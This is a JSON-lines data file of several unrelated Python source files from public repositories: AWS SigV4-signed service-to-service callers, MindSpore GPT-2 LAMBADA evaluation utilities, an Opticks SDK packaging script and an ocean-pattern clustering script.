response.text\n\nif __name__ == \"__main__\":\n print(main())","repo_name":"aws-samples/aws-zerotrust-service2service-workshop","sub_path":"src/ec2/curl-pkg/service_a_caller_sigv4.py","file_name":"service_a_caller_sigv4.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"25033587868","text":"from mindspore import Tensor\nfrom tensor_manipulations import extract_string_from_tensor\nfrom mindspore import dtype as mstype\nfrom mindspore.ops import operations as P\nfrom CrossEntropy import CrossEntropyCalculationWithMask\nfrom typing import TypeVar, Union\nfrom tokenization import Tokenizer\nimport numpy as np\n\ndef split_by_last_word(string_list):\n \"\"\"\n split list of strings list by last word \n \n Args:\n string_list: list(str), list of text in form of str\n \n Returns:\n list,list\n the list of text with last word removed and the last word text list\n\n \"\"\"\n # return [ ' '.join(s.split()[:-1]) for s in string_list],[ s.split()[-1:][0] for s in string_list]\n return [ ' '.join(s.split()[:-1]) for s in string_list]\n\ndef _get_lastword_range(prefix, stringlist, tokenizer=None):\n \"\"\"\n Get the range of lastword tokenized index in label_ids\n\n Args:\n prefix: list(str), list of text with its last word removed(a.k.a. \"prefix\") in form of str\n stringlist: list(str), list of text, same as it is in split_by_last_word \n tokenizer: GPT2Tokenizer, if not initiated, it will be created using the default setting in utils.tokenization, optional\n \n Returns:\n lastword_range: list(tuple), start and end postion of last word of each text of stringlist that used in selecting tokenized \n last word index in logits. lastword_logits --> logits[batch_index,start:end,::] \n \"\"\"\n if tokenizer is None:\n tokenizer = Tokenizer()\n print('[WARNING] parameter: tokenizer is missing in utils.lambada_utils.last_word_index, using Tokenizer() as default tokenizer')\n \n prefix_ids_len = [len(tokenizer.encode(prefix_str)) for prefix_str in prefix] # +1 for including bos \n full_ids_len = [len(tokenizer.encode(full_str)) for full_str in stringlist] # +1 for including bos \n \n #lastword_range = [(prefix_length, full_length) for prefix_length, full_length in zip(prefix_ids_len, full_ids_len)] \n lastword_range_ = [(prefix_length, full_length) for prefix_length, full_length in zip(prefix_ids_len, full_ids_len)]\n lastword_range = []\n for i in range(len(lastword_range_)):\n full_ids = tokenizer.encode(stringlist[i])\n last_prefix_id = tokenizer.encode(prefix[i])[-1]\n range_left = prefix_ids_len[i]\n for j in range(len(full_ids)-2,0,-1):\n if full_ids[j]== last_prefix_id:\n range_left = j+1\n break\n\n lastword_range.append((range_left,lastword_range_[i][1])) \n \n return lastword_range\n\ndef get_lastword_range(input_ids,config=None,tokenizer=None):\n \"\"\"\n Get the range of lastword tokenized index in input_ids\n\n Args:\n input_ids: Tensor(batch_size,seq_length)\n config: GPT2Config, config of GPT2 model, if not initiated, this function will create a MockConfig by params of input_ids, optional\n tokenizer: GPT2Tokenizer, if not initiated, it will be created using the default setting in utils.tokenization, optional\n \n Returns:\n lastword_range: list(tuple), start and end postion of last word of each text of stringlist that used in selecting tokenized \n last word index in logits. 
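For the AWS record above: aws-requests-auth derives the SigV4 signature from boto's credential chain. The same signing can be done with botocore alone; a minimal sketch (the URL and region are hypothetical placeholders, and valid AWS credentials are assumed to be available):

```python
import boto3
import requests
from botocore.auth import SigV4Auth
from botocore.awsrequest import AWSRequest

session = boto3.session.Session(region_name="eu-west-1")           # hypothetical region
url = "https://abc123.execute-api.eu-west-1.amazonaws.com/api/x"   # hypothetical endpoint

req = AWSRequest(method="GET", url=url)
SigV4Auth(session.get_credentials(), "execute-api", session.region_name).add_auth(req)
resp = requests.get(url, headers=dict(req.headers))  # send the signed request
print(resp.status_code)
```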
lastword_logits --> logits[batch_index,start:end,::] \n \"\"\"\n if tokenizer is None:\n tokenizer = Tokenizer()\n if config is None:\n config = MockConfig()\n config.batch_size = input_ids.shape[0]\n config.seq_length = input_ids.shape[1]\n\n string_list = extract_string_from_tensor(input_ids,mode='single',tokenizer=tokenizer,config=config)\n # prefix, _ = split_by_last_word(string_list)\n prefix = split_by_last_word(string_list)\n\n lastword_range = _get_lastword_range(prefix,string_list,tokenizer)\n\n return lastword_range\n\ndef extract_logits(logits = None, seq_pos = None):\n \"\"\"\n Args\n logits: Tensor(batch_size,seq_length,vocab_size) e.g.(8,1024,50257)\n seq_pos: list(batch_size) \n\n Return:\n output_logits: Tensor(batch_size,1,vocab_size) extract the Specified logit according to the seq_pos list .\n \"\"\"\n\n batch_size = logits.shape[0]\n for i in range(batch_size):\n\n logit = logits[i:i+1:1, seq_pos[i]:seq_pos[i]+1:1, ::]\n # print(\"extract_logits logit shape: {}\".format(logit.shape))\n if i == 0 :\n output_logits = logit\n else:\n output_logits = P.Concat()((output_logits, logit))\n\n # print(\"final logits:\",output_logits)\n \n return output_logits\n\n\ndef get_wholeword_label_str(input_ids,config=None,tokenizer=None):\n \"\"\"\n get whole word label_str from input_ids \n Args:\n input_ids: Tensor(batch_size,seq_length), indexs of input text\n config: GPT2Config, config of GPT2 model, if not initiated, this function will create a MockConfig by params of input_ids, optional\n tokenizer: GPT2Tokenizer, if not initiated, it will be created using the default setting in utils.tokenization, optional\n Returns:\n label_str: [str], lastword str given lambada as label\n \"\"\"\n if tokenizer is None:\n tokenizer = Tokenizer()\n if config is None:\n config = MockConfig()\n config.batch_size = input_ids.shape[0]\n config.seq_length = input_ids.shape[1]\n config.vocab_size = tokenizer.vocab_size\n\n #lastword_range is a list of tuples, seems like [...,(start_position_i,end_position_i),...]\n lastword_range = get_lastword_range(input_ids,config,tokenizer=tokenizer)\n\n #input_ids requires to shift right for one step for its every first token is <BOS> \n ids = input_ids[::,1:].asnumpy()\n\n label_ids = [ id_[index[0]:index[1]].tolist() for index,id_ in zip(lastword_range,ids)]\n \n # use GPT2Tokenizer to decode\n label_str = [ tokenizer.decode(label_id) for label_id in label_ids ]\n\n return label_str\n\nclass MockConfig:\n def __init__(self):\n pass\n\nif __name__ == \"__main__\":\n pass","repo_name":"viewsetting/MindSpore-GPT2","sub_path":"src/utils/lambada_utils.py","file_name":"lambada_utils.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"20937328629","text":"#!/usr/bin/env python3\nimport os\nfrom os.path import join\nimport os.path\nimport sys\nfrom optparse import OptionParser\nimport traceback\nimport shutil\nimport subprocess\nimport zipfile\n\nclass ScriptException(Exception):\n \"Report error while running script\"\n\ndef execute_process(args, bufsize=0, executable=None, preexec_fn=None,\n close_fds=None, shell=False, cwd=None, env=None,\n universal_newlines=False, startupinfo=None, creationflags=0):\n if sys.platform.startswith(\"win\"):\n stdin = subprocess.PIPE\n stdout = sys.stdout\n stderr = sys.stderr\n else:\n stdin = None\n stdout = None\n stderr = None\n\n process = subprocess.Popen(args, bufsize=bufsize, stdin=stdin,\n stdout=stdout, stderr=stderr, 
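The range logic in the record above locates the last word's tokens by comparing the tokenized lengths of the prefix and of the full string, then walking back to the last shared token id. A toy sketch of the basic length-difference idea (the whitespace `encode()` is a stand-in for the real GPT-2 tokenizer):

```python
def lastword_token_range(text, encode):
    prefix = ' '.join(text.split()[:-1])   # text with its last word removed
    return len(encode(prefix)), len(encode(text))

encode = lambda s: s.split()               # toy tokenizer (assumption)
print(lastword_token_range("the quick brown fox", encode))  # (3, 4)
```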
executable=executable,\n preexec_fn=preexec_fn, close_fds=close_fds, shell=shell,\n cwd=cwd, env=env, universal_newlines=universal_newlines,\n startupinfo=startupinfo, creationflags=creationflags)\n if sys.platform.startswith(\"win\"):\n process.stdin.close()\n returncode = process.wait()\n return returncode\n\ndef cp_file2(source_base_dir, destination_base_dir, common_dir, file_to_copy):\n full_src_file = join(source_base_dir, common_dir, file_to_copy)\n full_dst_dir = join(destination_base_dir, common_dir)\n return cp_file(full_src_file, full_dst_dir)\n\ndef cp_file(source_file, destination_dir):\n \"\"\"Copy specified file to destination dir, creating all necessary folders\n in destination if needed.\n\n src_file -- path of source file\n dst_dir -- path of destination directory\n\n \"\"\"\n if not(os.path.exists(destination_dir)):\n os.makedirs(destination_dir)\n shutil.copy2(source_file, join(destination_dir,\n os.path.basename(source_file)))\n\ndef cp_file3(source_file, destination_file):\n destination_dir = os.path.dirname(destination_file)\n if not(os.path.exists(destination_dir)):\n os.makedirs(destination_dir)\n shutil.copy2(source_file, destination_file)\n\ndef cp_dir2(source_base_dir, destination_base_dir, dir_to_copy,\n suffixes_to_match = [], exclude_matches = False,\n recursive_copy = False, dirs_to_exclude = [\".svn\", \"_svn\"]):\n full_src_dir = join(source_base_dir, dir_to_copy)\n full_dst_dir = join(destination_base_dir, dir_to_copy)\n return cp_dir(full_src_dir, full_dst_dir, suffixes_to_match,\n exclude_matches, recursive_copy, dirs_to_exclude)\n\ndef cp_dir(source_dir, destination_dir, suffixes_to_match = [],\n exclude_matches = False, recursive_copy = False,\n dirs_to_exclude = [\".svn\", \"_svn\"]):\n \"\"\"Copy all files with or without specified suffix in source directory to\n destination directory\n\n @param source_dir: path of source directory\n @type source_dir: L{str}\n @param destination_dir: path of destination directory\n @type destination_dir: L{str}\n @param suffixes_to_match: a list of the specified suffixes to\n match before files are copied. This may\n be an empty list and all files will match\n and therefore be copied.\n @type suffixes_to_match: L{list} of L{str}\n @param exclude_matches: if False, only files that end with\n suffix will be copied. If True, only\n files that don't end with suffix will be copied.\n @type exclude_matches: L{bool}\n @param recursive_copy: If True, the copy will be performed\n recursively. 
Note that the suffix to match\n only applies to files and not directories.\n @type recursive_copy: L{bool}\n @param dirs_to_exclude: List of directories that should be\n excluded when recursion is applied.\n @type dirs_to_exclude: L{list} of L{str}\n\n This function will create destination directory if it does not exist.\n \"\"\"\n dir_contents = os.listdir(source_dir)\n symlinks = False\n if not(os.path.exists(destination_dir)):\n os.makedirs(destination_dir)\n for entry in dir_contents:\n src_path = join(source_dir, entry)\n dst_path = join(destination_dir, entry)\n if symlinks and os.path.islink(src_path):\n linkto = os.readlink(src_path)\n os.symlink(linkto, dst_path)\n elif os.path.isdir(src_path):\n if recursive_copy and dirs_to_exclude.count(entry) == 0:\n cp_dir(src_path, dst_path, suffixes_to_match,\n exclude_matches, recursive_copy, dirs_to_exclude)\n else:\n matches = False\n if suffixes_to_match is None or len(suffixes_to_match) == 0:\n matches = True\n else:\n for suffix in suffixes_to_match:\n if entry.endswith(suffix) != exclude_matches:\n matches = True\n\n if matches:\n source_file = src_path\n if symlinks:\n the_file = commonutils.isSubversionSoftLink(source_file)\n if the_file is not None:\n source_file = the_file\n\n shutil.copy2(source_file, dst_path)\n\ndef copy_windows_build(opticks_code_dir, sdk_dest_dir,\n win_debug_dest_dir, static_libs, plugins,\n is_32_bit, is_debug, verbosity):\n if is_32_bit:\n arch = \"Win32\"\n else:\n arch = \"x64\"\n if is_debug:\n mode = \"debug\"\n else:\n mode = \"release\"\n binaries_dir = join(\"Build\", \"Binaries-%s-%s\" % (arch, mode))\n\n executables = [\"Opticks.exe\", \"OpticksBatch.exe\", \"SimpleApiLib.dll\"]\n for the_exec in executables:\n cp_file2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"Bin\"), the_exec)\n\n for the_lib in static_libs:\n cp_file2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"Lib\"), the_lib + \".lib\")\n\n for the_plugin in plugins:\n cp_file2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"PlugIns\"), the_plugin + \".dll\")\n\n cp_dir2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"PlugIns\", \"ArcProxy\"),\n suffixes_to_match = [\".dll\", \".exe\"])\n\n if is_debug:\n #Copy the pdbs for the static_libs\n if verbosity > 1:\n print(\"Gathering pdb's for %s...\" % (arch))\n all_pdbs = [os.path.splitext(x)[0] for x in executables] + static_libs + plugins\n for the_file in all_pdbs:\n pdbs_dir = join(binaries_dir,\"pdbs\")\n cp_file2(opticks_code_dir, win_debug_dest_dir,\n pdbs_dir, the_file + \".pdb\")\n if verbosity > 1:\n print(\"Done gathering pdb's for %s...\" % (arch))\n\ndef copy_dir_into_zip(zip_file, parent_src_dir, the_dir,\n prefix_dir, keep_the_dir=True):\n src_dir = join(parent_src_dir, the_dir)\n for root, dirs, files in os.walk(src_dir):\n try:\n dirs.remove(\".svn\")\n except Exception:\n pass\n try:\n dirs.remove(\"_svn\")\n except Exception:\n pass\n if keep_the_dir:\n the_zip_dir = root[len(parent_src_dir)+1:]\n else:\n the_zip_dir = root[len(parent_src_dir) + len(the_dir) + 1:]\n for the_file in files:\n source_file = join(root, the_file)\n linked_file = commonutils.is_subversion_soft_link(source_file)\n if linked_file is not None:\n source_file = linked_file\n zip_file.write(source_file,\n join(prefix_dir, the_zip_dir, the_file))\n\ndef create_toolkit_zip(opticks_code_dir, opticks_dependencies_dir,\n package_dir, ms_help_compiler,\n release32, debug32, release64, debug64,\n verbosity):\n\n if opticks_dependencies_dir is None:\n if 
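cp_dir above is essentially a recursive copy with suffix filters and an exclusion list for Subversion metadata. For the common case, the standard library covers it on Python 3.8+; a minimal sketch (the paths are placeholders):

```python
import shutil

shutil.copytree(
    "src_dir", "dst_dir",                           # hypothetical paths
    ignore=shutil.ignore_patterns(".svn", "_svn"),  # skip Subversion metadata
    dirs_exist_ok=True,                             # merge into an existing destination
)
```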
\"OPTICKSDEPENDENCIES\" in os.environ:\n opticks_dependencies_dir = os.environ[\"OPTICKSDEPENDENCIES\"]\n else:\n raise ScriptException(\"The path to the Opticks \"\\\n \"dependencies was not provided, see -d\")\n\n if not(os.path.exists(opticks_dependencies_dir)):\n raise ScriptException(\"The path to the Opticks dependencies \"\\\n \"does not exist %s, see -d\")\n\n if verbosity >= 1:\n print(\"Removing output from previous runs...\")\n out_dir = os.path.abspath(join(\"Toolkit\", \"SDK-Temp\"))\n win_debug_dir = os.path.abspath(join(\"Toolkit\", \"WinDebug-Temp\"))\n if os.path.exists(out_dir):\n shutil.rmtree(out_dir, False)\n\n if os.path.exists(win_debug_dir):\n shutil.rmtree(win_debug_dir, False)\n\n if verbosity >= 1:\n print(\"Done removing output from previous runs\")\n\n if verbosity >= 1:\n print(\"Creating SDK...\")\n app_version = commonutils.get_app_version_only(opticks_code_dir)\n ##### Create all the output directories\n os.makedirs(out_dir)\n os.makedirs(win_debug_dir)\n\n if verbosity > 1:\n print(\"Gathering files for SDK...\")\n cp_file3(\"README-sdk.txt\", join(out_dir, \"README.txt\"))\n s_app = os.path.abspath(join(opticks_code_dir, \"application\"))\n s_release = os.path.abspath(join(opticks_code_dir, \"Release\"))\n d_app = join(out_dir,\"application\")\n\n interface_suffixes = [\".h\"]\n cp_dir2(s_app, d_app, \"Interfaces\", suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugInUtilities\", \"Interfaces\"),\n suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugInUtilities\", \"pthreads-wrapper\"),\n suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, \"SimpleApiLib\",\n suffixes_to_match=interface_suffixes)\n compile_settings_suffix = [\".py\"]\n if is_windows():\n compile_settings_suffix.append(\".props\")\n cp_dir2(s_app, d_app, \"CompileSettings\",\n suffixes_to_match=compile_settings_suffix)\n cp_dir2(s_app, d_app, \"PlugInLib\", suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, \"HdfPlugInLib\", suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, \"NitfPlugInLib\",\n suffixes_to_match=interface_suffixes)\n\n #Copy the PlugInSamplerQt code to the right spot\n source_suffixes = interface_suffixes + [\".cpp\", \".ui\"]\n if is_windows():\n source_suffixes.append(\".vcxproj\")\n else:\n source_suffixes.append(\"SConscript\")\n\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"PlugInSamplerQt\"),\n suffixes_to_match=source_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"PlugInSampler\"),\n suffixes_to_match=source_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"PlugInSamplerHdf\"),\n suffixes_to_match=source_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"Tutorial\"),\n suffixes_to_match=source_suffixes)\n cp_file2(s_app, d_app, join(\"PlugIns\", \"src\", \"Aspam\"), \"Aspam.h\")\n\n if verbosity > 1:\n print(\"Done gathering files for SDK\")\n\n win_debug_code_dir = join(win_debug_dir, \"Code\")\n if is_windows():\n if verbosity > 1:\n print(\"Exporting Opticks source code...\")\n svn_export_code_args = list()\n svn_export_code_args.append(\"svn\")\n svn_export_code_args.append(\"export\")\n svn_export_code_args.append(\"-r\")\n svn_export_code_args.append(\"BASE\")\n svn_export_code_args.append(os.path.abspath(opticks_code_dir))\n svn_export_code_args.append(win_debug_code_dir)\n print(svn_export_code_args)\n input('> ')\n retcode = 0\n #retcode = execute_process(svn_export_code_args)\n if retcode != 0:\n raise ScriptException(\"Unable to 
export code.\")\n if verbosity > 1:\n print(\"Done exporting Opticks source code\")\n\n cp_file3(\"README-pdb-source.txt\",\n join(win_debug_dir, \"README.txt\"))\n\n #Copy dependencies\n if verbosity > 1:\n print(\"Exporting dependencies...\")\n svn_export_args = list()\n svn_export_args.append(\"svn\")\n svn_export_args.append(\"export\")\n svn_export_args.append(\"-r\")\n svn_export_args.append(\"BASE\")\n svn_export_args.append(os.path.abspath(opticks_dependencies_dir))\n svn_export_args.append(join(out_dir, \"Dependencies\"))\n print(svn_export_args)\n input('> ')\n #retcode = execute_process(svn_export_args)\n retcode = 0\n if retcode != 0:\n raise ScriptException(\"Unable to export dependencies\")\n if verbosity > 1:\n print(\"Done exporting dependencies\")\n\n ##### Run Doxygen to generate the html documentation\n if verbosity > 1:\n print(\"Generating Doxygen...\")\n build_doxygen_args = [\"python\", join(os.path.abspath(opticks_code_dir),\n \"build.py\"),\n \"--build-doxygen=all\",\n \"-d\", opticks_dependencies_dir]\n if is_windows():\n build_doxygen_args.append(\"--ms-help-compiler=%s\" % (ms_help_compiler))\n if verbosity == 2:\n build_doxygen_args.append(\"-v\")\n if verbosity == 0:\n build_doxygen_args.append(\"-q\")\n retcode = execute_process(build_doxygen_args)\n if retcode != 0:\n raise ScriptException(\"Error occurred while building \"\\\n \"on-line help\")\n s_doxygen_output = join(opticks_code_dir, \"Build\", \"DoxygenOutput\")\n d_doc_output = join(out_dir, \"doc\")\n cp_dir2(s_doxygen_output, d_doc_output, \"html\", recursive_copy = True)\n if is_windows():\n cp_file2(s_doxygen_output, d_doc_output, \"\",\n \"OpticksSDK-%s.chm\" % (app_version))\n if verbosity > 1:\n print(\"Done generating Doxygen\")\n\n if verbosity > 1:\n print(\"Acquiring Opticks binaries...\")\n static_libs = [\"PlugInLib\", \"PlugInUtilities\", \"HdfPlugInLib\", \"NitfPlugInLib\"]\n if is_windows():\n static_libs.append(\"SimpleApiLib\")\n plugins = [ \"AnnotationImagePalette\", \"Aspam\", \"AutoImporter\", \"BandBinning\", \"BandMath\", \"ConvolutionFilter\",\n \"CoreIo\", \"Covariance\", \"DataFusion\", \"Dted\", \"ENVI\", \"Fits\", \"GdalImporter\", \"Generic\",\n \"GeographicFeatures\", \"GeoMosaic\", \"Georeference\", \"Hdf\", \"Ice\", \"ImageComparison\", \"Kml\",\n \"Modis\", \"MovieExporter\", \"Nitf\", \"NitfCommonTre\", \"ObjectFinding\", \"Pca\", \"Pictures\", \"Results\",\n \"Scripts\", \"SecondMoment\", \"ShapeFileExporter\", \"Sio\", \"SpatialResampler\", \"Wavelength\",\n \"WizardExecutor\", \"WizardItems\" ]\n sample_plugins = [\"PlugInSampler\", \"PlugInSamplerQt\",\n \"PlugInSamplerHdf\", \"Tutorial\" ]\n if is_windows():\n cp_file2(s_app, d_app, \"\", \"SamplePlugIns.sln\")\n cp_file2(s_app, d_app, \"PlugInManager\", \"PlugInModule.def\")\n\n plugins = plugins + sample_plugins + [ \"Collada\" ]\n #Win32 Build\n if debug32:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs,plugins, True, True, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", True, \"32\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-win32-debug\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n if release32:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs, plugins, True, False, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", False, \"32\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-win32-release\", \"Bin\")\n 
commonutils.copy_dependencies(dp_list, bin_dir)\n\n #Win64 Build\n if debug64:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs, plugins, False, True, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", True, \"64\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-x64-debug\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n if release64:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs, plugins, False, False, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", False, \"64\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-x64-release\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n else:\n cp_file2(s_app, d_app, join(\"PlugIns\", \"src\"), \"SConstruct\")\n if sys.platform.startswith(\"linux\"):\n binaries_dir = join(\"Build\", \"Binaries-linux-x86_64-release\")\n else:\n binaries_dir = join(\"Build\", \"Binaries-solaris-sparc-release\")\n lib_dir = join(binaries_dir,\"Lib\")\n for the_lib in static_libs:\n cp_file2(opticks_code_dir, out_dir, lib_dir, \"lib%s.a\" % (the_lib))\n cp_file2(opticks_code_dir, out_dir, lib_dir, \"libSimpleApiLib.so\")\n cp_file2(opticks_code_dir, out_dir, lib_dir, \"ModuleShell.os\")\n\n for the_plugin in sample_plugins:\n cp_file2(opticks_code_dir, out_dir,\n join(binaries_dir,\"PlugIns\"), \"%s.so\" % (the_plugin))\n if not sys.platform.startswith(\"linux\"):\n #Make copy of the \"application\" dir but with an upper-case\n #first letter to maintain compatibility with earlier SDKs\n cp_dir(d_app, join(out_dir, \"Application\"), recursive_copy = True)\n if verbosity > 1:\n print(\"Done acquiring Opticks binaries\")\n if verbosity >= 1:\n print(\"Done building SDK\")\n\n if package_dir is not None and os.path.exists(package_dir):\n if is_windows():\n zip_name = join(package_dir,\n \"opticks-sdk-%s-windows.zip\" % (app_version))\n if verbosity > 1:\n print(\"Creating compressed archive %s...\" % (zip_name))\n zip_obj = zipfile.ZipFile(zip_name, \"w\", zipfile.ZIP_DEFLATED)\n copy_dir_into_zip(zip_obj, os.path.abspath(\"Toolkit\"),\n \"SDK-Temp\", \".\", False)\n zip_obj.close()\n if verbosity > 1:\n print(\"Done creating compressed archive\")\n\n zip_name = join(package_dir,\n \"opticks-pdb-sourcecode-%s-windows.zip\" % (app_version))\n if verbosity > 1:\n print(\"Creating compressed archive %s...\" % (zip_name))\n zip_obj = zipfile.ZipFile(zip_name, \"w\", zipfile.ZIP_DEFLATED)\n copy_dir_into_zip(zip_obj, os.path.abspath(\"Toolkit\"),\n \"WinDebug-Temp\", \".\", False)\n zip_obj.close()\n if verbosity > 1:\n print(\"Done creating compressed archive\")\n else:\n if sys.platform.startswith(\"linux\"):\n output_tar_bz2 = os.path.abspath(join(package_dir,\n \"opticks-sdk-%s-linux-x86_64.tar.bz2\" % (app_version)))\n else:\n output_tar_bz2 = os.path.abspath(join(package_dir,\n \"opticks-sdk-%s-sol10-sparc.tar.bz2\" % (app_version)))\n if verbosity > 1:\n print(\"Creating compressed archive %s...\" % (output_tar_bz2))\n tar_args = list()\n tar_args.append(\"tar\")\n tar_args.append(\"-cvf\")\n tar_args.append(\"-\")\n tar_args.append(\".\")\n tar = subprocess.Popen(tar_args, stdout=subprocess.PIPE,\n cwd=out_dir)\n\n output_handle = open(output_tar_bz2, \"wb\")\n bzip2_args = list()\n bzip2_args.append(\"bzip2\")\n bzip2_args.append(\"-c\")\n bzip2 = subprocess.Popen(bzip2_args, stdin=tar.stdout,\n stdout=output_handle)\n\n tar_ret = tar.wait()\n bzip_ret = bzip2.wait()\n output_handle.close()\n 
if tar_ret != 0:\n raise ScriptException(\"Running tar failed.\")\n if bzip_ret != 0:\n raise ScriptException(\"Running bzip2 failed.\")\n if verbosity > 1:\n print(\"Done creating compressed archive\")\n\ndef is_windows():\n \"\"\"Determine if this script is executing on the Windows operating system.\n @return: Return True if script is executed on Windows, False otherwise.\n @rtype: L{bool}\n\n \"\"\"\n return sys.platform.startswith(\"win32\")\n\ndef parse_args(args):\n ##### Parse the arguments\n if is_windows():\n desc = \"Generate the Developers Toolkit .zip file for the \"\\\n \"32-bit and 64-bit version of Opticks for Windows.\"\n else:\n desc = \"Generate the Developers Toolkit file for the Solaris or Linux \"\\\n \"version of Opticks.\"\n\n parser = OptionParser(usage=\"%prog [options]\",\n version=\"%prog 1.0\", description=desc)\n parser.add_option(\"-c\", \"--code-dir\", action=\"store\",\n dest=\"opticks_code_dir\",\n help=\"The path to the checkout of the Code folder \"\\\n \"from the Opticks trunk.\")\n parser.add_option(\"-d\", action=\"store\", dest=\"dependencies\",\n help=\"The path to Opticks dependencies\")\n parser.add_option(\"--package-dir\", action=\"store\",\n dest=\"package_dir\", help=\"The directory where the toolkit \"\\\n \"output should be stored. This directory must already exist.\")\n if is_windows():\n ms_help_compiler_path = \"C:\\\\Program Files (x86)\\\\HTML Help Workshop\"\n if not os.path.exists(ms_help_compiler_path):\n ms_help_compiler_path = \"C:\\\\Program Files\\\\HTML Help Workshop\"\n parser.add_option(\"--ms-help-compiler\",\n dest=\"ms_help_compiler\", action=\"store\", type=\"string\")\n parser.add_option(\"--Nr32\",\n help=\"Omit the release 32-bit binaries from the SDK\",\n dest=\"release32\", action=\"store_false\")\n parser.add_option(\"--Nd32\",\n help=\"Omit the debug 32-bit binaries from the SDK\",\n dest=\"debug32\", action=\"store_false\")\n parser.add_option(\"--Nr64\",\n help=\"Omit the release 64-bit binaries from the SDK\",\n dest=\"release64\", action=\"store_false\")\n parser.add_option(\"--Nd64\",\n help=\"Omit the debug 64-bit binaries from the SDK\",\n dest=\"debug64\", action=\"store_false\")\n parser.set_defaults(ms_help_compiler=ms_help_compiler_path,\n release32=True, debug32=True,\n release64=True, debug64=True)\n parser.add_option(\"-q\", \"--quiet\", help=\"Print fewer messages\",\n action=\"store_const\", dest=\"verbosity\", const=0)\n parser.add_option(\"-v\", \"--verbose\", help=\"Print more messages\",\n action=\"store_const\", dest=\"verbosity\", const=2)\n parser.set_defaults(verbosity=1)\n\n #Parse the optional arguments, plus any additional arguments present\n #after optional arguments\n options = parser.parse_args(args[1:])[0]\n if not(is_windows()):\n options.ms_help_compiler = None\n options.release32 = None\n options.debug32 = None\n options.release64 = None\n options.debug64 = None\n\n return options\n\ndef main(args):\n options = parse_args(args)\n try:\n if options.opticks_code_dir is None:\n if \"OPTICKS_CODE_DIR\" in os.environ:\n options.opticks_code_dir = os.environ[\"OPTICKS_CODE_DIR\"]\n else:\n raise ScriptException(\"The path to the Opticks \"\\\n \"source code was not provided, see -c or --code-dir\")\n\n if not(os.path.exists(options.opticks_code_dir)):\n raise ScriptException(\"The path to the Opticks source \"\\\n \"code does not exist %s, see -c or --code-dir\")\n\n sys.path.append(options.opticks_code_dir)\n import commonutils\n #the previous import line, only imports local to this 
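The Solaris/Linux branch above pipes `tar -cvf - .` through `bzip2 -c` with two subprocesses. The standard tarfile module can produce the same .tar.bz2 in-process; a minimal sketch (the paths are placeholders):

```python
import tarfile

# equivalent of: (cd out_dir && tar -cvf - .) | bzip2 -c > sdk.tar.bz2
with tarfile.open("sdk.tar.bz2", "w:bz2") as tar:
    tar.add("out_dir", arcname=".")  # hypothetical directory to archive
```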
function\n #so push import to global scope.\n globals()[\"commonutils\"] = commonutils\n\n create_toolkit_zip(options.opticks_code_dir, options.dependencies,\n options.package_dir, options.ms_help_compiler,\n options.release32, options.debug32, options.release64,\n options.debug64, options.verbosity)\n except Exception as e:\n print(\"--------------------------\")\n traceback.print_exc()\n print(\"--------------------------\")\n return 2000\n return 0\n\n#Main execution path when script is run\nif __name__ == \"__main__\":\n #sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)\n retcode = main(sys.argv)\n if retcode != 0:\n print(\"ERROR: Return code is %s\" % (retcode))\n sys.exit(retcode)\n","repo_name":"opticks-org/opticks","sub_path":"Release/Installation/build-toolkit.py","file_name":"build-toolkit.py","file_ext":"py","file_size_in_byte":24338,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"54"} +{"seq_id":"16301067898","text":"from OceanPatternsIndicator.utils.Plotter import Plotter\nimport time\nfrom preprocessing_utils import *\nimport pandas as pd\nimport sklearn\nfrom pyxpcm.models import pcm\n\n\ndef get_args():\n \"\"\"\n Extract arguments from command line\n\n Returns\n -------\n parse.parse_args(): dict of the arguments\n\n \"\"\"\n import argparse\n\n parse = argparse.ArgumentParser(description=\"Ocean patterns method\")\n parse.add_argument('k', type=int, help=\"number of clusters K\")\n parse.add_argument('file_name', type=str, help='input dataset')\n parse.add_argument('var_name_ds', type=str, help='name of variable in dataset')\n parse.add_argument('var_name_mdl', type=str, help='name of variable in model')\n parse.add_argument('algo', type=str, help='algo choice (Kmean, mini-batch, GMM')\n return parse.parse_args()\n\n\ndef train_model(k, x, var_name_ds, algo):\n if algo == \"kmean\":\n print(\"model used: kmean\")\n model = sklearn.cluster.KMeans(n_clusters=k, n_init=10, max_iter=1000)\n elif algo == \"batch\":\n print(\"model used: mini batch kmean\")\n model = 